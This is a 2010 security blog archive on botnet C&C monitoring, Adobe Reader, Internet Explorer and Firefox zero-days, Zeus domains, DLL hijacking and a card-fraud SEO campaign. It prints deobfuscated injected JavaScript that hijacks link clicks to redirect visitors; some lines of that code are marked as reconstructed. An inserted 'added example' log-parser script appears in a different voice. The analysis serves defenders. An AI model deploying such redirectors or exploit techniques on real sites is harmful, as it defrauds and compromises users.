Wednesday, December 29, 2010

some considerations on Ettercap source code repository breach

A new issue of a zine called “owned and exposed” has recently been released ( I have to admit I laughed a lot when I saw this picture.


I think that the picture above is the truth of what the security field is today. Anyway, leaving my personal considerations aside, I would like to show you a mind map that I made during a past research on web-bot-based botnets; it could be useful to understand how it is possible to find and use entry points in some very important web sites. As a starting point I decided to focus the whole big picture on a generic bot source code. Given a bot, with enough Googling and some scripting language knowledge, it is possible to do the rest.


This mind map is not so obvious, and it is not so clear what the links with the title of this post are. I will try to describe what I mean by the process represented by this mind map. During a research of some months ago, I tried to identify 3 contexts where a researcher (color independent) could find useful information to raise the level of detail. In other words, starting from a bot source code analysis, you are in the first context (1, code analysis). In this context the analysis has generated information like authors (not so useful in this case), code snippets (useful for googling for other bots derived from the analyzed bot, for example), crew (again not so useful), and the c&c server (VERY USEFUL).

So with the code snippets and the c&c server it is possible to try to find much more information. Specifically, with a c&c server that commands web-based bots it is sometimes possible to look at what happens in the c&c channel, for example by coding and running a fake bot for catching them. The fake bot is linked to the c&c channel (usually an IRC server) and starts to log everything. The analysis of what was logged puts your mind in the 2nd context (named “intelligence”). What can be found is shown in the leaves of the 2nd context. From the information gathered from a c&c it is possible to know, for example, which web sites are exposed to a particular Remote File Include. Collecting many of these web sites leads your mind to the 3rd context.

Usually you only have to decide what you want to do with the exposed web site list obtained from the 2nd context, thanks to someone (the bot admin) who launches, for example, bots specialized in scanning to check whether a web site is prone to a specific issue. What is the link with Ettercap (and the other cases reported by the zine “owned and exposed”)? If you are the main coder of a project and you decide to put this code in a source repository that exposes to its users exploitable web apps (like, for example, some old release of the e107 CMS prone to a remote code execution condition), it is possible to choose one (or more) of the leaves of the 3rd context. In other words, by logging the tons of c&c channels it is possible to find many other famous web sites exposed to these problems.

The following little screenshot makes it all clearer (I hope). What you see is the result of a fake bot that I coded months ago. In particular, the output of this fake bot is a log file where all messages in a c&c channel are logged. The grep command was launched on this log file. As you can see, on sourceforge some user accounts offer access to a vulnerable version of the popular CMS e107 (
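The grep step above is the part of the process that turns a channel log into a list of exposed hosts to notify. The following Node.js script is an added example (not the blog's fake bot, whose code is not published here) of doing that step in a structured way: it parses channel log lines, keeps only the messages in which bots report a URL with the chosen keyword, discards negated reports ("not vuln"), groups the URLs per hostname and counts how many distinct nicks reported each one. The log lines, the "[RFI] <url> vuln" message shape and the `.test` hostnames are constructed for the example.

```javascript
// Added example: turn a captured IRC C&C channel log into a per-host list of
// reported URLs, so that the site owners can be notified.
// SAMPLE_LOG, the message format and the hostnames are constructed samples.
const SAMPLE_LOG = [
  "[2010-12-20 10:01:12] <op> !scan http://www.example-forum.test/e107/",
  "[2010-12-20 10:01:40] <botA1> [RFI] http://hosting.example.test/~user1/e107_files/index.php vuln",
  "[2010-12-20 10:02:03] <botB7> [RFI] http://hosting.example.test/~user2/e107/ vuln",
  "[2010-12-20 10:02:05] <botB7> [RFI] http://www.example-forum.test/e107/ not vuln",
  "[2010-12-20 10:03:11] <op> hello all",
  "[2010-12-20 10:03:30] <botC2> [RFI] http://hosting.example.test/~user1/e107_files/index.php vuln",
];

const LINE_RE = /^\[([^\]]+)\]\s+<([^>]+)>\s+(.*)$/;
const URL_RE = /https?:\/\/[^\s"'<>]+/g;

// Split one "[time] <nick> message" line; null when the line has another shape.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { time: m[1], nick: m[2], message: m[3] };
}

// Per hostname, the URLs that bots reported with `keyword`, each with the
// number of distinct nicks that reported it (more nicks = more confidence).
function exposedHosts(lines, keyword) {
  const negated = new RegExp(`not\\s+${keyword}`, "i");
  const byHost = new Map(); // host -> Map(url -> Set(nick))
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const text = rec.message.toLowerCase();
    if (!text.includes(keyword.toLowerCase()) || negated.test(rec.message)) continue;
    for (const url of rec.message.match(URL_RE) || []) {
      let host;
      try { host = new URL(url).hostname; } catch { continue; } // skip malformed URLs
      if (!byHost.has(host)) byHost.set(host, new Map());
      const urls = byHost.get(host);
      if (!urls.has(url)) urls.set(url, new Set());
      urls.get(url).add(rec.nick);
    }
  }
  // Flatten to plain records, most-reported URL first.
  const report = [];
  for (const [host, urls] of byHost) {
    for (const [url, nicks] of urls) report.push({ host, url, reports: nicks.size });
  }
  return report.sort((a, b) => b.reports - a.reports || a.url.localeCompare(b.url));
}

// Stand-alone run: print a tab-separated notification list for the sample log.
for (const r of exposedHosts(SAMPLE_LOG, "vuln")) {
  console.log(`${r.host}\t${r.reports}\t${r.url}`);
}
```

On the sample log this yields two entries, both on hosting.example.test: the user1 path reported by two different bots, and the user2 path reported once; the "not vuln" report and the operator's commands are dropped. Counting distinct reporting nicks is a cheap way to rank which hosts deserve a notification first.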


One note: I decided to put the owning activities in the “counter measures” leaf because "good and evil" is just a matter of who does things.

That's all for the moment. Maybe I will publish some more explanation of this process as soon as possible. Feedback and questions are welcome.

Counter measures: don’t expose users with bugged web apps!

Tuesday, December 14, 2010

LOIC - Crafted C&C Channel Topic Could Lead A Crash

Following the trend of these days I played (locally) with one of the latest releases of LOIC (Low Orbit Ion Cannon DDOS Tool). Inserting a (not so) long string in the topic of a C&C IRC channel, there seems to be a memory corruption condition.

The screenshot above shows a crafted topic that triggers the issue. The impacted tested release is the

A few more details related to the .NET exception:

Some important notes: I saw on twitter that someone has retweeted this post adding "remote code execution". I never spoke about a "remote code execution" condition for this issue.

Anyway, IMHO this issue could be inserted in the counter measures list for this kind of threat. Acting from a client-side perspective may sometimes be useful.

Tuesday, November 30, 2010

cve-2010-4091 exploited ? – 0.2 – Adobe Reader 9.3.0

Starting from the malwaretracker sample (see my previous posts), it seems that edx and ecx are set to some interesting values:


Thursday, November 25, 2010

cve-2010-4091 exploited ? – 0.1

Trying to reverse the shellcode contained within the PDF that seems to exploit CVE-2010-4091, according to the sample reported by MalwareTracker, the following URL has been found:


From Robtex:


The URL above is down or no longer available at this time. Was it really exploited to retrieve malware from ? :) . Many thanks to binjo for his support and tools. For the PDF check my previous post: 

All these things continue to be weird and funny! (WOMENS-PUZZLE.COM :-) ). IMPORTANT: it is not certain that the reported PDF really exploits CVE-2010-4091.

Friday, November 19, 2010

cve-2010-4091 exploited ?

November 24,  2010 – Update:

Looking for other exploitation attempts I found a Malwaretracker sample where the PDF seems to be spread via a URL that contains: filepdf.php@v=zday


The following analysis reports the objects used within this PDF (which is different from the fulldisclosure PDF):

November 22 , 2010 – update:

Some interesting (and useful) notes about the original full disclosure PDF PoC published on full disclosure mailing list:

Who’s looking for eggs in your PDF?

November 19, 2010:

This is my latest result. It seems that with a crafted PDF, as explained by Haifei Li in his paper (see previous posts for reference), the code flow looks like it could be hijacked. At least I have this impression from the debugger response, as you can see in this screenshot:


Feedback and suggestions are welcome. Some notes: this is only an attempt to try to understand this issue better. My mistakes at this stage are very likely.

Thursday, November 11, 2010

cve-2010-4091 – printSeps - exploitation attempts

November 26, 2010 – update:
This is a very useful presentation (from Immunity Sec) where it is possible to get some methods for approaching the reversing of the JavaScript engine in the Adobe Reader context:

Attacking Embedded Languages

November 16, 2010 – update:
In the previous post I didn’t report the place in AcroRD32.dll where the memory corruption is triggered (as a result of the use-after-free bug). The following screenshot is the leak screenshot:


At first view, the AcroRd32.dll offset 0094450 seems a zone involved with the Acro Heap Manager, so this could confirm some of my doubts about the question “where to play with this bug?”. So, IMHO, this bug is due to the double handling mechanism of the heap. In other words, what the OS heap management has previously freed may be freed again by the Adobe Heap Manager, with the result shown. I hope to release a more detailed analysis as soon as possible.

November 11, 2010
In my previous post ( the timeline and what is called the exposure time for this bug, which seems to have a bit of a strange history, have been followed. After my initial analysis, only a few details have been released about it. But after playing a bit with this flaw I can confirm one of the latest and clearest comments from VUPEN via Twitter:

exploiting the PDF printSeps was complicated. It involves allocating/freeing chained blocks before triggering the flaw

After this tweet I started to look for more information about it. So IMHO good support for “allocating/freeing before triggering” the flaw may be obtained from “heaplib”, as well documented in

Is it possible to fit heaplib.js for Adobe Reader and insert it inside a crafted PDF to obtain the heap handling? For this goal it could be useful to play with what is called the Acro Managing Pool. A very interesting reference is from a Fortinet researcher:

The heaplib.js for Internet Explorer is here:

Anyway, what I can say from my experience with this flaw is that the PDF posted on full disclosure seems to lack something, and using a debugger may sometimes lead you the wrong way. These are only ideas, which could be wrong as well as right. Feedback is welcome.

Thursday, November 4, 2010

full disclosure xpl.pdf Adobe Reader 9.4 poc - printSeps() - cve-2010-4091

November 26,2010 – Update:

Thank you, Mario, but our printSeps() is in another castle !

November 22, 2010 – Update:

Who’s looking for eggs in your PDF?  (reported also in  cve-2010-4091 exploited ?)

November 16, 2010 – Update:

Security updates available for Adobe Reader and Acrobat – ABSP10-28

November 9, 2010 – Update:

Adobe  PSIRT released - CVE-2010-4091

US-CERT response:

November 8, 2010 – Update 2:

VUPEN confirms the "remote code execution"

November 8, 2010 – Update 1:

Some screenshots of my brief analysis of this bug. The vtable where the PrintSeps() method is referenced:

The location where the Javascript code is being processed:
Where Adobe Reader 9.4 crashes after PrintSeps is processed:

November 5, 2010 – Update:

emerging threats Snort sign

eEye report as remote code execution

Adobe response:

November 4, 2010:
The vulnerable method seems to be printSeps():

more info:

The original xpl.pdf is retrieved via




Wednesday, November 3, 2010

CVE-2010-3962 - yet another Internet Explorer RCE

Update - November, 12 2010:
Amnesty International Hong Kong Website Injected With Latest Internet Explorer 0-day

Update - November, 5 2010:
CVE-2010-3962 - BindShell proof of concept:

Metasploit Module

More on the IE 0-day - Hupigon Joins The Party

Update - November, 4 2010:
the memory corruption proof of concept is (place the following code as is within an HTML file):


Microsoft Internet Explorer CSS "clip" Attribute Memory Corruption

November, 3 2010:
New IE 0-Day used in Targeted Attacks

The issue seems related to a "use after free" bug when some CSS tag sequences are parsed.
One of the implicated malware samples seems to be a Backdoor.Pirpi variant.

Other links:

Microsoft Security Advisory 2458511 (workaround included)

Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October, 29 2010 - UPDATE: the working exploit (according to the BugX blog):
October, 28 2010
For those who still do not know .. The proof of concept for CVE-2010-3765 is the following:


More details at: The issue seems resolved with Firefox 3.6.12.

As mentioned in some of my old posts reading a bugzilla repository is always a good thing:

Feedback is welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): A deep and very interesting analysis from Trend Micro:

Update (15 October): ThreatExpert has released the domain name generation algorithm for MUROFET/Licat

(14 October)
I have found some new domains involved in this threat as you can see in the following list:

The 333 value for the “s” URL parameter permits downloading what is recognized as Trojan/ZBot.B (Symantec name), while 111 stands for “get Zeus 2.1 (as named by Zeustracker) config file”. The drop zone is requested with the following syntax:


This malware seems to use a C&C domain name generation approach similar to the one used by Conficker. For example, the latest domain ( ) seems registered for the 14th of October 2010 malware activity, as reported by

The following Anubis Binary Analysis submission shows the behavior of this malware:

and the ThreatExpert analysis with detection engine info:

The domains above seem hosted by the following IP address:

The following Robtex table permits to retrieve other domains involved:

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post ( there is evidence of a large number of sites that are suffering from the same problem. In particular, using keywords that are common to many of these malicious pages, you get the following results:

As well:

Yet another dork that retrieves a very similar URL format:
This can reasonably confirm that this stuff is related to a big (and well organized) Black Hat SEO campaign. Thank you very much to Edgar Tools and the author of JJEncode for their support.

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis where my post is also reported:
Internet  Explorer exSploit Milk codes

October 5, 2010:

From the MDL forum, I got a post where a user (many thanks to Edgar) reported a strange Javascript code injected in some Italian web sites. Specifically the message is located at the following URL:
The reported code looks like shown in the following screenshot:

At first look it appears like nonsense code for someone who is not a Javascript guru like me. So I decided to try to decode this very interesting code in order to know what it does. The first step was to try to use some Javascript alert() function calls in the prologue code. So the first lines of code have been modified as follows:
The blue pills show the places where the alert() calls have been placed. Executing this extract of code, the alert call sequence generated these results:
The rest of the code deobfuscation is obtained by placing within a textarea the code referenced by “Function()”, as follows:
also the end of the obfuscated code must be modified as shown:
Once this modified code is placed in a test HTML page and rendered by Firefox, this deobfuscated jquery code is obtained:
page_links = [];
function setGlobalOnLoad(f) {
   var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
   if (root){
      if(root.addEventListener) root.addEventListener("load", f, false)
      else if(root.attachEvent) root.attachEvent("onload", f)
   } else {
      if(typeof window.onload == 'function') {
         var existing = window.onload
         window.onload = function() {
            // body cut off in the screenshot; chaining the previous handler is assumed
            existing();
            f();
         }
      } else {
         window.onload = f
      }
   }
}
function addHandler(object, event, handler) {
  if (typeof object.addEventListener != 'undefined')
    object.addEventListener(event, handler, false);
  else if (typeof object.attachEvent != 'undefined')
    object.attachEvent('on' + event, handler);
}

// only acts for Google Toolbar / Chrome user agents or when the visitor arrives from another site
if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
    var right_browser='yes';
}else     var right_browser='no';

function getCookie(c_name) {
  if (document.cookie.length>0) {
    c_start=document.cookie.indexOf(c_name + "=");
    if (c_start!=-1) {
      c_start=c_start + c_name.length+1;
      c_end=document.cookie.indexOf(";",c_start);   // line missing from the screenshot; c_end is needed below
      if (c_end==-1) c_end=document.cookie.length;
      return unescape(document.cookie.substring(c_start,c_end));
    }
  }
  return "";
}
var c_index = Math.floor(Math.random() * 5);
var fcoo=getCookie('c_first');
var exdate=new Date();
document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();
// fires roughly one visit in five, only once per visitor (cookie), only for the "right" browsers
if (c_index==4 && fcoo!='false' && right_browser=='yes') {
    setGlobalOnLoad(function() {
    var block = document.getElementById('mlk');
    var links = block.getElementsByTagName('A');
    for (var i = 0; i < links.length; i++) {
        page_links.push(links[i].href);   // loop body cut off in the screenshot; collecting the injected hrefs is assumed
    }
    var links = document.links;
    for (var i = 0; i < links.length; i++) {
        addHandler(links[i], "click", function(event) {
            var index = Math.floor(Math.random() * (page_links.length - 1));
            window.location.href = page_links[index];   // assignment target cut off in the screenshot; a redirect is assumed
        });
    }
    });
}
Update: the code has been obfuscated using the following encoding script: (Mowab, thank you very much for your support).
The obtained code, at first sight, seems a loader of the href objects injected in the compromised web page (as shown alongside). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contains the link to the malicious HTML page injected within the compromised hosts. In particular all servers listed and reported by the MDL post seem to reference URLs like these:
The injected HTML page leads to a site black listed for credit card fraud. In this case the compromised host analyzed is Calling, for example,
this page is retrieved:
Clicking on one of the download buttons, a CAPTCHA request appears as follows:
Clicking on the download button, the following URL is called:

Following the download sequence, a message appears that entices the user to sign up to download the desired file:

Trying to sign up, a fake promotional message like this is shown:
The checkout action tries to contact this website
which is black listed for credit card fraud, as noticed by the MyWOT response
I think that the compromised hosts, as reported at the beginning of this post, have been implicated in a Black Hat SEO infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.

Wednesday, August 25, 2010

DLL Hijacking - my test cases on a default HP notebook installation - CyberLink products vulnerable

CyberLink products appear to be vulnerable. The CyberLink tools (such as Power2Go) exist in the default installation of the HP 64-bit notebook (with Microsoft Windows 7).

I have checked and tested the proof of concept generated by dllhijacking. The products are:

- CyberLink PowerDirector v7
- CyberLink Power2Go DVD v6.0

The issue is triggered with the iso, pdl, pds, p2g and p2i file formats, and the DLL requested by the applications is mfc71loc.dll or mfc(nationality)71.dll. The exploitation doesn't require copying the fake DLL into the app folder (like many other issues released nowadays) but simply putting it in the current directory from which the "data" files are loaded: so, for example, a USB flash drive, a compressed archive and so on. IMHO, the problem is not related to big vendors or to well known tools and applications (Adobe Reader, Office and so on); instead it is very critical in all circumstances where users don't know what they have on their notebook. I mean the big number of notebooks across the world full of not so well known software that may be exploited in this manner.

From the CyberLink web site (

"CyberLink, a maker of the world-acclaimed DVD player software PowerDVD, also designs multimedia solutions for well-known brands such as DELL, HP, ACER, Medion, Packard Bell, and Dixons, to name a few. PowerDVD can help organizations achieve their business goals with powerful, yet easy-to-use video solutions, and now comes with a Volume License Program to better serve corporate, academic, government, and non-profit customers. Millions of licenses have already been granted to major organizations every year—all of them recognizable household names" .

The following screenshot shows the exploits generated by the dllhijacking script:

DLL Hijacking - my test cases

One of my test case lists on a VM system.

Sorry, you may have found a bug.... (in Fiddler)

Playing with the HD Moore tools for DLL hijacking stuff (Exploiting DLL Hijacking Flaws), I found this interesting result on one of my VMs:

I don't know if I have time to spend on a deep investigation of this possible Fiddler bug... but in some cases the side effects are your best friends.

Friday, July 30, 2010

strange .info TLD domains

Looking for something that might attract my attention I found the following URL:

If at a first look it may appear like a nonsense URL, googling more I found this message on the Symantec community blog where something is said about it:

It seems that this kind of domain is related to a C&C domains array. As always, with Robtex it is possible to find something more, as shown in the following screenshot:

Also it could be found something in MalwareURL DB at the following URL:

As shown, it seems that these domain types are linked with the VB.AAG Trojan. The malicious URL appears in the form .info/DATA, but at this time the HTTP response is the following:

I think it can reasonably be understood that this could be a system to make the detection of threats that use these domain types harder for antivirus and IDS/IPS; also this naming convention fits perfectly for javascript obfuscation.

Update (08/31/2010) Another one:

From Robtex:


Tuesday, July 27, 2010


Reading something about this trojan, which uses CVE-2010-2568 as spreading vector, I found that
the binary is located at hxxxp:// The process tries to contact the following host:

From Robtex:

Wednesday, June 23, 2010

SpyEye C&C and spreading with Microsoft SpyNet Black Hat Seo technique

The following domain typo squat has been detected googling the URL:


As known, Spy Net is a Microsoft forum where new threats, malware and so on are discussed.
More info about this service are placed here:

In the following screenshot the result (shown with a smile) from Google is reported:

The red point is the MyWOT response for the malicious URL. At the following page the SpyEye admin panel:


The RobTex info about the fake SpyNet domain (and others):

Some notes: this domain was already known from MDL and other malicious URL databases. Malware Domain List records:

So I think that the interesting thing is the smile that appears as Google result.

An update (7/6/2010): the "smile Google result" is still alive :)

Sunday, June 13, 2010

Wednesday, May 19, 2010

finally PAIMEI

PAIMEI installed. Great framework!

The following code shows my "hello world!" PAIMEI script: given a process id, this script basically detects the creation of new threads and dumps the first 5 assembly instructions for each one. In addition, the process register values during the CreateThread are dumped:

Also, I've found a good resource for learning more about PAIMEI:

Wednesday, March 10, 2010

CVE-2010-0806 - Internet Explorer 6/7 0 day

Some notes about:

Internet Explorer 0-day targeted in spam runs

Targeted Internet Explorer 0day Attack Announced

Robtex queries for the Mcafee reported URLs:


hxxxp:// -

The following exploiter (retrieved from one of the URLs posted by McAfee) uses Base64 encoding for hiding resources:

This issue has been detected in "iepeers.dll". With a good ActiveX fuzzer it may be trivial to find more info (CLSID: 7E8BC44E-AEFF-11D1-89C2-00C04FB6BFC4). Dranzer seems good enough: try to check for more details.

Metasploit module:

Microsoft Internet Explorer iepeers.dll use-after-free exploit